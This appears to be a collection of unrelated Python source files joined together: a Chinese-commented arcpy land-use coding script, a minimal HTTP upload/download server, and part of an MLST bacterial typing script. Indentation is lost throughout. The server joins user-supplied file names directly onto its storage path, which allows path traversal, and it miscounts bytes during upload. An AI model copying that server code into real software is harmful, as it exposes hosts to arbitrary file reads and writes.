arcpy.SelectLayerByAttribute_management("imlyr", "CLEAR_SELECTION")
arcpy.SelectLayerByAttribute_management("lulyr", "CLEAR_SELECTION")
# arcpy.Delete_management("imlyr")
# arcpy.Delete_management("lulyr")
# function
# Phase函数是计算landuse图层的“Phase”字段
# landuse:Phase函数输入参数,是Landuse数据集的图层,必须为矢量数据图层
# "!Image_src![13:21]":是函数输入参数的Image_src字段的13位至21位的字符串,13、21可以根据实际作调整
def Phase(landuse):
arcpy.MakeFeatureLayer_management(landuse, "lulyr")
arcpy.CalculateField_management("lulyr", "Phase", "!Image_src![13:21]", "PYTHON_9.3", "")
def UniqueCode_new(landuse,intufu):
tufu_count = arcpy.GetCount_management(intufu)
arcpy.MakeFeatureLayer_management(landuse, "dikuai_lyr")
arcpy.MakeFeatureLayer_management(intufu, "intufulyr")
curs = arcpy.SearchCursor(intufu)
j = 1
for row in curs:
# NUMBER = row[0]
# shp = row[1]
gpid = row.getValue("NUMBER_1W")
# print gpid
gpidV = '"' + gpid + '"'
# print gpidV
express = '"NUMBER_1W" =' + "'" + gpid + "'"
# print currentTime(),"-",express
try:
arcpy.SelectLayerByAttribute_management("intufulyr", "NEW_SELECTION", express)
arcpy.SelectLayerByLocation_management("dikuai_lyr", "HAVE_THEIR_CENTER_IN", "intufulyr", "", "NEW_SELECTION")
count = int(arcpy.GetCount_management("dikuai_lyr").getOutput(0))
print time.strftime("%Y-%m-%d %H:%M:%S",time.localtime()), ":", gpid, ":", str(j), "/", tufu_count, "---", count
if count > 0:
i = 1
u_cur = arcpy.da.UpdateCursor("dikuai_lyr", ["Unique_Cod", "Dist_Code"])
for u_row in u_cur:
# if u_row[0] is None:
# Cal_Value = "086" + str(u_row[1]) + gpid
if i <= 9 and i <= count:
u_row[0] = "0" * 5 + str(i)
elif i <= 99 and i <= count:
u_row[0] = "0" * 4 + str(i)
elif i <= 999 and i <= count:
u_row[0] = "0" * 3 + str(i)
elif i <= 9999 and i <= count:
u_row[0] = "0" * 2 + str(i)
elif i <= 99999 and i <= count:
u_row[0] = "0" * 1 + str(i)
elif i <= 999999 and i <= count:
u_row[0] = "0" * 0 + str(i)
i = i + 1
u_cur.updateRow(u_row)
arcpy.SelectLayerByAttribute_management("dikuai_lyr", "CLEAR_SELECTION")
arcpy.SelectLayerByAttribute_management("intufulyr", "CLEAR_SELECTION")
j = j + 1
except IOError, e:
print "TopoEngine Error", gpid
# function
# UniqueCode函数是计算landuse图层的“Unique_Code”字段
# landuse:UniqueCode函数输入参数,是Landuse数据集的图层,必须为矢量数据图层,且“Dist_Code”字段值必须预先填写。
# intufu:函数输入参数,是1比10000的分幅框,
def UniqueCode(landuse,intufu):
tufu_count = arcpy.GetCount_management(intufu)
arcpy.MakeFeatureLayer_management(landuse, "dikuai_lyr")
arcpy.MakeFeatureLayer_management(intufu, "intufulyr")
curs = arcpy.SearchCursor(intufu)
j = 1
for row in curs:
# NUMBER = row[0]
# shp = row[1]
gpid = row.getValue("NUMBER_1W")
# print gpid
gpidV = '"' + gpid + '"'
# print gpidV
express = '"NUMBER_1W" =' + "'" + gpid + "'"
# print currentTime(),"-",express
try:
arcpy.SelectLayerByAttribute_management("intufulyr", "NEW_SELECTION", express)
arcpy.SelectLayerByLocation_management("dikuai_lyr", "HAVE_THEIR_CENTER_IN", "intufulyr", "", "NEW_SELECTION")
count = int(arcpy.GetCount_management("dikuai_lyr").getOutput(0))
print time.strftime("%Y-%m-%d %H:%M:%S",time.localtime()), ":", gpid, ":", str(j), "/", tufu_count, "---", count
if count > 0:
i = 1
u_cur = arcpy.da.UpdateCursor("dikuai_lyr", ["Unique_Cod", "Dist_Code"])
for u_row in u_cur:
# if u_row[0] is None:
Cal_Value = "086" + str(u_row[1]) + gpid
if i <= 9 and i <= count:
u_row[0] = Cal_Value + "0" * 5 + str(i)
elif i <= 99 and i <= count:
u_row[0] = Cal_Value + "0" * 4 + str(i)
elif i <= 999 and i <= count:
u_row[0] = Cal_Value + "0" * 3 + str(i)
elif i <= 9999 and i <= count:
u_row[0] = Cal_Value + "0" * 2 + str(i)
elif i <= 99999 and i <= count:
u_row[0] = Cal_Value + "0" * 1 + str(i)
elif i <= 999999 and i <= count:
u_row[0] = Cal_Value + "0" * 0 + str(i)
i = i + 1
u_cur.updateRow(u_row)
arcpy.SelectLayerByAttribute_management("dikuai_lyr", "CLEAR_SELECTION")
arcpy.SelectLayerByAttribute_management("intufulyr", "CLEAR_SELECTION")
j = j + 1
except IOError, e:
print "TopoEngine Error", gpid
# function
# srcFields2dbFields函数是根据ID_src、Name_src及矢量入库分类体系转换成ID_db、Name_db。
#根据实际情况,['11','12']、['21','22']······需要作调整。
# landuse:srcFields2dbFields函数的输入参数。
def srcFields2dbFields(landuse):
icursor = arcpy.UpdateCursor(landuse)
for row in icursor:
tempID = str(row.getValue("ID_src"))
if tempID in ['100']:
row.setValue("ID_db","100")
row.setValue("Name_db","耕地")
elif tempID in ['200']:
row.setValue("ID_db","200")
row.setValue("Name_db","园地")
elif tempID in ['300']:
row.setValue("ID_db","300")
row.setValue("Name_db","林地")
elif tempID in ['400']:
row.setValue("ID_db","400")
row.setValue("Name_db","草地")
elif tempID in ['600']:
row.setValue("ID_db","500")
row.setValue("Name_db","城乡建设用地")
elif tempID in ['700']:
row.setValue("ID_db","600")
row.setValue("Name_db","交通运输用地")
elif tempID in ['500']:
row.setValue("ID_db","700")
row.setValue("Name_db","水域及水利设施用地")
elif tempID in ['800','900']:
row.setValue("ID_db","800")
row.setValue("Name_db","其他土地")
icursor.updateRow(row)
del icursor,row
def Copy_children2Parent(root,target):
for parent, dirnames, filenames in os.walk(root):
for file in filenames:
img_path = os.path.join(parent, file)
if not os.path.exists(os.path.join(root,file)) :
print currentTime(),os.path.basename(img_path)
shutil.copy(img_path, target)
else:
print currentTime(),os.path.basename(img_path),"already exists in ", target
if __name__ == "__main__":
# landuse = r"D:\Chenjl_Data\矢量入库原始数据\26上海农普\一类测量\YLDCTB310000.shp"
# intufu = r"C:\Users\Administrator\Documents\ArcGIS\Default.gdb\Export_Output1b1w"
# UniqueCode(landuse, intufu)
landuse = r"C:\test\四川landuse.shp"
image = r"C:\test\四川landuse_fenfu.shp"
# p = multiprocessing.Process(target=UniqueCode,args=(landuse, image))
# p.start()
# print p.pid
UniqueCode_new(landuse, image) |
main.py | #!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
import sys, os, datetime, re, urllib, shutil
import socket
import socketserver
import threading
os.chdir(os.path.dirname(__file__) or '.') # CD to this directory
from helpers import *
import mimeLib
_statics = {
'buffer_size': 4096,
'config': read_ini('config.ini'),
'allowed_paths': [
'index.html'
]
}
def initdirs():
md = lambda s: os.makedirs(s, exist_ok=True)
def cf(s):
f = open(s, 'ab')
f.write(b'')
f.close()
md(_statics['config']['folder'])
initdirs()
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.path = '/index.html'
path = recover(self.path)
v = urlvar(path)
if len(path) >= 2:
if path[0:2] == '/~':
if v['apikey'] != _statics['config']['apikey']:
self.send_response(403)
self.send_header('Content-Type', mimeLib.getmime('*.txt'))
self.end_headers()
self.wfile.write(b'Forbidden')
return
if v['action'] == 'get_list':
self.send_response(200)
self.send_header('Content-Type', mimeLib.getmime('*.txt'))
self.end_headers()
self.wfile.write('\n'.join(os.listdir(_statics['config']['folder'])).encode('utf-8'))
return
elif v['action'] == 'get_file':
filepath = _statics['config']['folder'] + v['file']
if os.path.exists(filepath):
self.send_response(200)
self.send_header('Content-Type', mimeLib.getmime(filepath))
# self.send_header('Cache-Control', 'public, max-age=86400')
self.end_headers()
with open(filepath, 'rb') as f:
while True:
data = f.read(_statics['buffer_size'])
if data:
self.wfile.write(data)
else:
break
return
else:
self.send_response(404)
self.send_header('Content-Type', mimeLib.getmime('*.html'))
self.end_headers()
self.wfile.write(b'Not Found')
return
else:
# local file
path = path[1:]
if os.path.exists(path) and path in _statics['allowed_paths']:
self.send_response(200)
self.send_header('Content-Type', mimeLib.getmime(path))
# self.send_header('Cache-Control', 'public, max-age=86400')
self.end_headers()
with open(path, 'rb') as f:
while True:
data = f.read(_statics['buffer_size'])
if data:
self.wfile.write(data)
else:
break
return
else:
self.send_response(404)
self.send_header('Content-Type', mimeLib.getmime('*.html'))
self.end_headers()
self.wfile.write(b'Not Found')
return
def do_POST(self):
if self.path == '/':
self.path = '/index.html'
path = recover(self.path)
v = urlvar(path)
if len(path) >= 2:
if path[0:2] == '/~':
if v['apikey'] != _statics['config']['apikey']:
self.send_response(403)
self.send_header('Content-Type', mimeLib.getmime('*.txt'))
self.end_headers()
self.wfile.write(b'Forbidden')
return
elif v['action'] == 'upload':
self.send_response(200)
self.send_header('Content-Type', mimeLib.getmime('*.txt'))
self.end_headers()
store_path = _statics['config']['folder']
store_name = v['name']
os.makedirs(store_path, exist_ok=True)
content_length = int(self.headers['Content-Length'])
read_bytes = 0
with open(store_path + store_name, 'ab', buffering=_statics['buffer_size']) as f:
while read_bytes < content_length:
bytes_to_write = content_length - read_bytes
data = self.rfile.read(min(_statics['buffer_size'], bytes_to_write))
f.write(data)
read_bytes += _statics['buffer_size']
self.wfile.write(b'OK')
class ThreadedHTTPServer(socketserver.ThreadingMixIn, HTTPServer):
""" Handle requests in a separate thread. """
if __name__ == '__main__':
d = _statics['config']
address, port = d['address'], int(d['port'])
server = ThreadedHTTPServer((address, port), MyServer)
print('Starting server on address %s, port %s...' % (address, port))
try:
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
# print("Server loop running in thread:", server_thread.name)
server.serve_forever()
except KeyboardInterrupt:
pass
|
mMLST.py | #! /usr/env/python
__author__ = 'mikeknowles, akoziol'
""" Includes threading found in examples:
http://www.troyfawkes.com/learn-python-multithreading-queues-basics/
http://www.ibm.com/developerworks/aix/library/au-threadingpython/
https://docs.python.org/2/library/threading.html
Revised with speed improvements
"""
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Blast import NCBIXML
from threading import Thread
from Queue import Queue
from collections import defaultdict
from cStringIO import StringIO
from glob import glob
import subprocess, os, time, sys, shlex, re, threading, json, errno, operator
from argparse import ArgumentParser
parser = ArgumentParser(description='Performs blast analyses to determine presence of alleles in a genome query, and '
'types genome based on typing profile. Adds novel alleles and profiles to the '
'appropriate files. '
'Example command: '
'-p /home/blais/PycharmProjects/MLST '
'-s /home/blais/PycharmProjects/MLST/sequences '
'-O /home/blais/PycharmProjects/MLST/Organism '
'-o Vibrio '
'-S MLST')
parser.add_argument('-p', '--path', required=True,
# default='/home/blais/PycharmProjects/pythonGeneSeekr/',
help='Specify path for custom folder locations. If you don\'t supply additional paths'
'e.g. sequencePath, allelePath, or organismPath, then the program will look for '
'MLST files in .../path/Organism, and the query sequences in ../path/sequences')
parser.add_argument('-c', '--cutoff', required=False, default=98,
help='The percent identity cutoff value for BLAST matches. Default is 98%)')
parser.add_argument('-s', '--sequencePath', required=False,
default='/home/blais/PycharmProjects/MLST/sequences',
help='The location of the query sequence files')
parser.add_argument('-a', '--alleleProfilePath', required=False,
# default='/home/blais/PycharmProjects/pythonGeneSeekr/Organism/Salmonella/cgMLST',
help='The path of the folder containing the two folders containing '
'the allele files, and the profile file e.g. /path/to/folder/Organism/Salmonella/cgMLST'
'Please note the requirements for the profile database in the readme')
parser.add_argument('-O', '--organismPath', required=False,
help='The path of the folder containing the organism folders e.g. /path/to/folder/Organism')
parser.add_argument('-o', '--organism', required=False,
help='The name of the organism you wish to type. Must match the folder name containing the schemes'
'e.g. Salmonella')
parser.add_argument('-S', '--scheme', required=False,
help='The scheme you wish to use. Must match the folder name containing the scheme e.g. cgMLST.'
'Furthermore, this folder must contain two folders: "alleles" and "profile". The alleles '
'folder contains the allele files in .fasta format, and the profile folder contains '
'the profile in .txt format. Please note the requirements for the profile in the readme')
parser.add_argument('-u', '--updateProfileFalse', required=False, default=True,
help='By default, the program automatically creates new sequence profiles and appends these '
'profiles to the profile file. If, instead, you wish to wish to see the closest match of a '
'query genome to known reference profiles, set this to False.')
parser.add_argument('-U', '--updateAlleleFalse', required=False, default=True,
help='By default, the program automatically creates new allels and appends these '
'alleles to the appropriate file. If, instead, you wish to wish to see the closest match of a '
'query genome to known reference alleles, set this to False.')
# Get the arguments into a list
args = vars(parser.parse_args())
# Define variables from the arguments - there may be a more streamlined way to do this
# Add trailing slashes to the path variables to ensure consistent formatting (os.path.join)
path = os.path.join(args['path'], "")
cutoff = float(args['cutoff'])/100
if args['sequencePath']:
sequencePath = os.path.join(args['sequencePath'], "")
else:
sequencePath = ""
if args['alleleProfilePath']:
allelePath = os.path.join(args['alleleProfilePath'], "")
else:
allelePath = ""
if args['organismPath']:
organismPath = os.path.join(args['organismPath'], "")
else:
organismPath = ""
scheme = args['scheme']
organism = args['organism']
updateProfile = args['updateProfileFalse']
updateAllele = args['updateAlleleFalse']
# Empty the updateProfile and/or updateAllele if they are not True - will be used in if checks later
if updateProfile != True:
updateProfile = ""
if updateAllele != True:
updateAllele = ""
def make_path(inPath):
"""from: http://stackoverflow.com/questions/273192/check-if-a-directory-exists-and-create-it-if-necessary \
does what is indicated by the URL"""
try:
os.makedirs(inPath)
# os.chmod(inPath, 0777)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def make_dict():
"""Makes Perl-style dictionaries"""
return defaultdict(make_dict)
# Initialise the count used in the dotter function
count = 0
def dotter():
"""Prints formatted time to stdout at the start of a line, as well as a "."
whenever the length of the line is equal or lesser than 80 "." long"""
# Use a global variable
global count
if count <= 80:
sys.stdout.write('.')
count += 1
else:
sys.stdout.write('\n[%s] .' % (time.strftime("%H:%M:%S")))
count = 1
def makeblastdb(dqueue):
"""Makes blast database files from targets as necessary"""
while True: # while daemon
fastapath = dqueue.get() # grabs fastapath from dqueue
# remove the path and the file extension for easier future globbing
db = fastapath.split(".")[0]
nhr = "%s.nhr" % db # add nhr for searching
FNULL = open(os.devnull, 'w') # define /dev/null
if not os.path.isfile(str(nhr)): # if check for already existing dbs
subprocess.Popen(shlex.split("makeblastdb -in %s -dbtype nucl -out %s" % (fastapath, db)), stdout=FNULL, stderr=FNULL)
# make blastdb
dotter()
dqueue.task_done() # signals to dqueue job is done
sys.exit() # necessary
# Declare queues, list, and dictionaries
dqueue = Queue()
blastqueue = Queue()
testqueue = Queue()
plusqueue = Queue()
plusdict = defaultdict(make_dict)
profileData = defaultdict(make_dict)
MLSTseqType = defaultdict(make_dict)
bestDict = defaultdict(make_dict)
resultProfile = defaultdict(make_dict)
genedict = defaultdict(list)
blastpath = []
threadlock = threading.Lock()
def makedbthreads(fastas):
"""Setup and create threads for class"""
# Create and start threads for each fasta file in the list
for i in range(len(fastas)):
# Send the threads to makeblastdb
threads = Thread(target=makeblastdb, args=(dqueue,))
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for fasta in fastas:
# Add the fasta file to the queue
dqueue.put(fasta)
dqueue.join() # wait on the dqueue until everything has been processed
def xmlout(fasta, genome):
"""Parses variables from supplied tuples? dictionaries?"""
global path
# Extract the variables from the passed variables
gene = fasta.split('/')[-1] # split file from path, could use os.path.split
genename = gene.split('.')[0]
genomename = os.path.basename(genome).split(".")[0]
# Create the tmp folder (if necessary)
make_path("%stmp" % path)
out = "%stmp/%s.%s.xml" % (path, genomename, genename) # Changed from dictionary to tuple
# Return the parsed variables
return path, gene, genename, genomename, out, fasta
def alleleSplitter(alleleNames):
# Multiple try-excepts. Maybe overly complicated, but I couldn't get it work any other way
# This (hopefully) accounts for all the possible naming schemes for the alleles
try: # no split - just allele numbers e.g. >12
match = re.search(r"(>\d+)", alleleNames)
alleleNumber = match.group().split(">")[1]
allelePreNumber = ""
except (IndexError, AttributeError):
try: # split on "_" e.g. >AROC_12
# alleleNumber is the number of the allele(!). It should be different for each allele
alleleNumber = alleleNames.split("_")[1]
# allelePreNumber is anything before the allele number. It should be the same for each allele
allelePreNumber = alleleNames.split("_")[0]
except IndexError:
try: # split on "-" e.g. >AROC-12
alleleNumber = alleleNames.split("-")[1]
allelePreNumber = alleleNames.split("-")[0]
except IndexError:
try: # split on " " e.g. >AROC 12
alleleNumber = alleleNames.split(" ")[1]
allelePreNumber = alleleNames.split(" ")[0]
except IndexError:
try: # split on change from letters to numbers e.g. >AROC12
match = re.search(r"(>[A-z/a-z]+)(\d+)", alleleNames)
alleleNumber = match.groups()[1]
allelePreNumber = match.groups()[0]
except (IndexError, AttributeError):
alleleNumber = alleleNames
allelePreNumber = alleleNames
# Return the variables
return int(alleleNumber), allelePreNumber
def blastparse(blast_handle, genome, gene, cutoff, genepath):
"""Parses BLAST results, and populates a dictionary with the results"""
global plusdict
global profileData
global updateAllele
snpDict = {}
dataDict = {}
records = NCBIXML.parse(blast_handle) # Open record from memory-mapped file
dotter()
# Split the extension from the genome name
genomeName = os.path.basename(genome).split('.')[0]
numhsp = sum(line.count('<Hsp>') for line in iter(blast_handle.readline, ""))
if numhsp >= 1:
# Since we scanned through result_handle looking for HSPs, the position of the read/write pointer
# within the file is at the end. To reset it back to the beginning, .seek(0) is used
blast_handle.seek(0)
# There was an issue with errors referring to end of record - I think this had something to do with the program
# trying to read .xml files that improperly formatted due to the program crashing mid-file creation. I don't
# know if this actually does anything, or whether there just haven't been any issues since I made this change
# if records:
for record in records: # This process is just to retrieve HSPs from xml files
for alignment in record.alignments:
for hsp in alignment.hsps:
# Calculate the percent identity
percentIdentity = "%.2f" % float(float(hsp.identities) / float(alignment.length) * 100)
allele = str(alignment.title.split(" ")[-1])
# If the results are 100% identical to the reference allele, add them to the dictionary
if hsp.identities >= alignment.length:
# Clears out any "N" values in the dictionary
if "N" in plusdict[genomeName][gene]:
plusdict[genomeName][gene].clear()
plusdict[genomeName][gene][allele] = percentIdentity
# As the blast results files are not sorted by percent identity, and, at least for rMLST
# genes, not all genes are the same length, a match can occur after lots of close matches
snpDict.clear()
# Optionally process results if the percent identity is cutoff-99.9% and there is no 100% match in the dictionary
elif not gene in plusdict[genomeName] and not snpDict and hsp.identities >= alignment.length * cutoff:
if updateAllele:
# Puts the HSP in the correct order - hits to the negative strand will be
# reversed compared to what we're looking for
if hsp.sbjct_start < hsp.sbjct_end:
end = hsp.sbjct_end
else:
end = hsp.sbjct_start
# Screen out hits that are shorter than the targets
# Keeping it this format even though this if statement could be re-written more efficiently
if end < alignment.length:
pass
else:
# Add the details of the mismatching allele to two dictionaries to be processed below
snpDict[genepath] = hsp.query
dataDict[genomeName] = gene
# If alleles aren't being updated, add the allele and the percent identity match to the reference allele
else:
plusdict[genomeName][gene][allele] = percentIdentity
# If the percent identity is below the 98% cutoff threshold or is the hsp is too short
elif not gene in plusdict[genomeName] and not snpDict:
plusdict[genomeName][gene]["N"] = 0
# If there are no records, populate the dictionary with "N" and a 0% identity
else:
plusdict[genomeName][gene]["N"] = 0
# Add matches that are cutoff < match identity < 99.9% and the same length of the target to the allele file
if snpDict:
# Initialise some variables
alleleNames = [] # The allele names already in the allele file
allelePreNumber = "" # The text before the allele number e.g. >AROC
alleleNumber = 0 # The last allele in the file e.g. 72
# Go through the allele files in snpDict
for gPath in snpDict:
# Open the allele file
with open(gPath) as geneFile:
for line in geneFile:
# Only interested in the header for each allele
if ">" in line:
# Append all, but only use the last - used to be a string instead of a list
alleleNames.append(line)
# Find the allele number and the text before the number for different formats
alleleNumber, allelePreNumber = alleleSplitter(alleleNames[-1])
# I wanted to keep the new allele numbers distinct from the old ones, so they will start at 1000000
if alleleNumber < 1000000:
newAlleleNumber = 1000000
# As this will continuously update the allele database, I need to check if I've already added new alleles
else:
newAlleleNumber = alleleNumber + 1
# Initialise newAllele - formatted updated allele number e.g. >AROC1000000
newAllele = ""
# Accounts for no pre-number text being present (e.g. >12)
if not allelePreNumber:
# Create a sequence record using BioPython
fasta = SeqRecord(Seq(snpDict[gPath], "fasta"), # snpDict[gPath] is the hsp sequence
description="", # if this is not added, then some junk is written to the new header
id=str(newAlleleNumber)) # keep the format of just the allele number e.g. >1000000
# If there is pre-number text, do the same thing, but use the allele pre-number as well
else:
allelePreNumber = allelePreNumber.split(">")[1]
newAllele = "%s-%s" % (allelePreNumber, newAlleleNumber)
fasta = SeqRecord(Seq(snpDict[gPath], "fasta"),
description="",
id=newAllele)
# Open the allele file to append the new sequence record
with open(gPath, "a") as updatedFasta:
# Use the SeqIO module to properly format the new sequence record
SeqIO.write(fasta, updatedFasta, "fasta")
# Perform some cleanup - need to remove all database and results files associated with the allele file
# prior to its update. Otherwise, the new changes to the file will not be reflected on subsequent iterations
# of this genome/allele file comparison
# The path and file name of the allele file without an extension
baseName = os.path.splitext(gPath)[0] # Despite the fact that I don't use os.path.basename to generate this
# Remake the database files
updatedb = [gPath]
makedbthreads(updatedb)
# Now use this new allele in populating plusdict
for updatedGenome in dataDict:
# The percent identity has to be 100% - this allele matches itself
plusdict[updatedGenome][dataDict[updatedGenome]][newAllele] = 100.00
# Should this have been closed earlier? I don't know
blast_handle.close()
class runblast(threading.Thread):
"""Runs the multi-threaded blast analysis"""
def __init__(self, blastqueue):
self.blastqueue = blastqueue
threading.Thread.__init__(self)
def run(self):
while True:
global blastpath, plusdict # global varibles, might be a better way to pipe information
genome, fasta, blastexist, cutoff = self.blastqueue.get() # retrieve variables from queue
path, gene, genename, genomename, out, genepath = xmlout(fasta, genome) # retrieve from string splitter
#Precaution
threadlock.acquire()
# Add the appropriate variables to blast path
blastpath.append((out, path[-1], gene, genename,)) # tuple-list
threadlock.release()
# Print a dot for each gene, genome combination processed
dotter()
# Run the BioPython BLASTn module with the genome as query, fasta(target gene) as db,
# a mild evalue of 0.1, and XML formatted output
# Removed perc_identity=percentIdentity from the call, as this allows more flexibility for parsing files
# with different cutoff values - if I want to re-analyse a search with a lower cutoff, I won't have to
# re-perform the BLAST search each time
db = fasta.split(".")[0]
blastn = NcbiblastnCommandline(query=genome, db=db, evalue=0.1, outfmt=5)
# Note that there is no output file specified - the search results are currently stored in stdout
stdout, stderr = blastn()
# Search stdout for matches - if the term Hsp appears (the .find function will NOT
# return -1), a match has been found, and stdout is written to file
if stdout.find('Hsp') != -1:
blast_handle = StringIO(stdout) # Convert string to IO object for use in SearchIO using StringIO
blastparse(blast_handle, genome, genename, cutoff, genepath) # parse the data already in memory
# If there are no hsps, then populate the dictionary with the negative results
else:
plusdict[genomename][genename]["N"] = 0
# Close the thread
self.blastqueue.task_done()
def blastnthreads(fastas, genomes, cutoff):
"""Setup and create threads for blastn and xml path"""
blastexist = {}
# Create threads for each gene, genome combination
for genome in genomes:
for fasta in fastas:
# Add the appropriate variables to the threads
blastqueue.put((genome, fasta, blastexist, cutoff))
blastqueue.join()
def blastDatabaseClearer(genePath):
"""Due to the nature of the program updating allele files, it's not desirable to use previously generated databases.
Additionally, with the use of these files by multiple programs, there is an issue. This script makes database files
as follows: aroC.fasta becomes aroC.nhr, etc. The current SPAdes assembly pipeline would take that same .fasta file
and create aroC.fasta.nhr. Deleting database files prevents issues with glob including database files."""
# Get all the .nhr, .nin, .nsq files
databaseList = glob("%s/*.n*" % genePath)
# And delete them
for allele in databaseList:
os.remove(allele)
def organismChooser(path, alleleProfilePath, organismPath, schemeName, organismName):
"""Allows the user to choose which organism to be used in the analyses"""
# Initialise a count variable to be used in extracting the desired entry from a list of organisms
orgcount = 0
schemecount = 0
alleles = []
profile = []
# If the path of the folder containing the allele and profile subfolders is provided
if alleleProfilePath:
# Set the genePath variable for use in blastDatabaseClearer
genePath = "%salleles" % alleleProfilePath
# Remove and previously created blast database files
blastDatabaseClearer(genePath)
# Create lists of the alleles, and the profile
alleles = glob("%salleles/*.*fa*" % alleleProfilePath)
# If the profile has previously been processed in this script, use the .json file
profile = glob("%sprofile/*.json" % alleleProfilePath)
# Otherwise use the .txt file
if not profile:
profile = glob("%sprofile/*.txt" % alleleProfilePath)
else:
# Get a list of the organisms in the (default) Organism subfolder
if not organismPath and not organismName:
orgList = glob("%sOrganism/*" % path)
# Iterate through the sorted list
for folder in sorted(orgList):
# Ensure that folder is, in actuality, a folder
if os.path.isdir(folder):
# Print out the folder names and the count
print "[%s]: %s" % (orgcount, os.path.split(folder)[1])
orgcount += 1
# Get the user input - the number entered corresponds to the list index
response = input("Please select an organism: ")
# Get the organism path into a variable
organism = sorted(orgList)[int(response)]
organismName = os.path.split(organism)[1]
elif organismPath and not organismName:
orgList = glob("%s*" % organismPath)
# Iterate through the sorted list
for folder in sorted(orgList):
# Ensure that folder is, in actuality, a folder
if os.path.isdir(folder):
# Print out the folder names and the count
print "[%s]: %s" % (orgcount, os.path.split(folder)[1])
orgcount += 1
# Get the user input - the number entered corresponds to the list index
response = input("Please select an organism: ")
# Get the organism path into a variable
organism = sorted(orgList)[int(response)]
organismName = os.path.split(organism)[1]
# Get the schemes into a list
if not schemeName:
if not organismPath:
schemeList = glob("%sOrganism/%s/*" % (path, organismName))
else:
schemeList = glob("%s/%s/*" % (organismPath, organismName))
# Iterate through the sorted list
for folder in sorted(schemeList):
# Ensure that folder is, in actuality, a folder
if os.path.isdir(folder):
# Print out the folder names and the count
print "[%s]: %s" % (schemecount, os.path.split(folder)[1])
schemecount += 1
# Same as above
schemeResponse = input("Please select a typing scheme:")
scheme = sorted(schemeList)[int(schemeResponse)]
schemeName = os.path.split(scheme)[1]
# Set the variables as above
genePath = "%s/alleles" % scheme
blastDatabaseClearer(genePath)
alleles = glob("%s/alleles/*.*fa*" % scheme)
profile = glob("%s/profile/*.json" % scheme)
if not profile:
profile = glob("%s/profile/*.txt" % scheme)
# If the name of the typing scheme is provided
else:
# If the organism path is not provided
if not organismPath:
# Default to using "Organism" in the path
scheme = "%sOrganism/%s/%s" % (path, organismName, schemeName)
else:
# Otherwise set scheme as follows:
scheme = "%s%s/%s" % (organismPath, organismName, schemeName)
# Put the query and quality genes into lists
genePath = "%s/alleles" % scheme
blastDatabaseClearer(genePath)
alleles = glob("%s/alleles/*.*fa*" % scheme)
profile = glob("%s/profile/*.json" % scheme)
if not profile:
profile = glob("%s/profile/*.txt" % scheme)
# Get the path for the original .txt profile file
profileTxt = "%s.txt" % os.path.splitext(profile[0])[0]
return alleles, profile[0], organismName, schemeName, profileTxt
def profilR(profileFile):
"""Creates a dictionary from the profile scheme"""
# Initialise the dictionary
global profileData
lastEntry = ""
geneList = []
# The gene names are present in the first line of the profile file
# Note: if the profile files are ever updated, then the clonal complex column must be removed
# Make the json filename from profileFile - it might already be .json, but this doesn't take long to do
JSONProfile = "%s.json" % os.path.splitext(profileFile)[0]
# If this scheme has previously been used, then the profileData dictionary is written to disk for increased speed.
# Parsing a json file was approximately 10 times faster than parsing the original tab-delimited file
# Get the MLST profiles for each sequence type
with open(profileFile) as profile:
# Files have to be in tab-delimited format
header = profile.readline().rstrip().split("\t")
# As certain typing schemes are not in any discernible order, using a naturally ordered list instead of a
# dictionary to store the names is a good idea
for gene in header:
# The first column must have "ST" in the header
if not "ST" in gene:
dotter()
geneList.append(gene)
# Don't do this if the .json profile has previously been created
if not os.path.isfile(JSONProfile):
for line in profile:
# Grab the name of the last profile
# MLSTcount will used to associate the gene name in header to the allele (e.g. adk 12)
MLSTcount = 1
# Don't need to get the header information again
# if not "ST" in line:
# len(header) will be the same length as the data in line
while MLSTcount < len(header):
# Remove newlines and split on tabs
data = line.rstrip().split("\t")
# Populate profileData with the sequence type, gene name, and the allele number
profileData[data[0]][header[MLSTcount]] = data[MLSTcount]
# Increment
MLSTcount += 1
# Split the name (if necessary) to just have the profile number
# Write the json file to disk
JSONreport = open(JSONProfile, "wb")
output = json.dumps(profileData, sort_keys=True, indent=4, separators=(',', ': '))
JSONreport.write(output)
JSONreport.close()
else:
with open(JSONProfile, "rb") as jsonReport:
# Load the data
profileData = json.load(jsonReport)
return profileData, geneList
def sequenceTyper(profileDict, profileFile, geneList, updateProfile):
"""Determines the sequence type of each strain based on comparisons to sequence type profiles"""
global MLSTseqType
global bestDict
# Initialise variables
header = 0
alleleCount = 0
multiAllele = []
multiPercent = []
bestMatch = defaultdict(int)
bestCount = 0
# Iterate through the genomes
for genome in plusdict:
global resultProfile
# Initialise bestMatch[genome] with an integer - this will eventually be replaced by the number of matches
bestMatch[genome] = defaultdict(int)
# For each gene in plusdict[genome]
for gene in plusdict[genome]:
# Clear the appropriate count and lists
alleleCount = 0
multiAllele = []
multiPercent = []
for allele, percentID in plusdict[genome][gene].iteritems():
# "N" alleles screw up the allele splitter function
if allele != "N":
# Use the alleleSplitter function to get the allele number
alleleNumber, allelePreNumber = alleleSplitter(allele)
# Append as appropriate - alleleNumber is treated as an integer for proper sorting
multiAllele.append(int(alleleNumber))
multiPercent.append(percentID)
# If the allele is "N"
else:
# Append "N" and a percent identity of 0
multiAllele.append("N")
multiPercent.append(0)
# Trying to catch cases that where the allele isn't "N", but can't be parsed by alleleSplitter
if not multiAllele:
multiAllele.append("N")
multiPercent.append(0)
# Populate bestDict with genome, gene, alleles - joined with a space (this was written like this because
# allele is a list generated by the .iteritems() above, and the percent identity
bestDict[genome][gene][" ".join(str(allele) for allele in sorted(multiAllele))] = multiPercent[0]
# Find the profile with the most alleles in common with the query genome
for sequenceType in profileDict:
# Reset counts to 0
matchCount = 0
bestCount = 0
# The number of genes in the analysis
header = len(profileData[sequenceType])
# refallele is the allele number of the sequence type
refAllele = profileData[sequenceType][gene]
# If there are multiple allele matches for a gene in the reference profile e.g. 10 692
if len(refAllele.split(" ")) > 1:
# Map the split (on a space) alleles as integers - if they are treated as integers,
# the alleles will sort properly
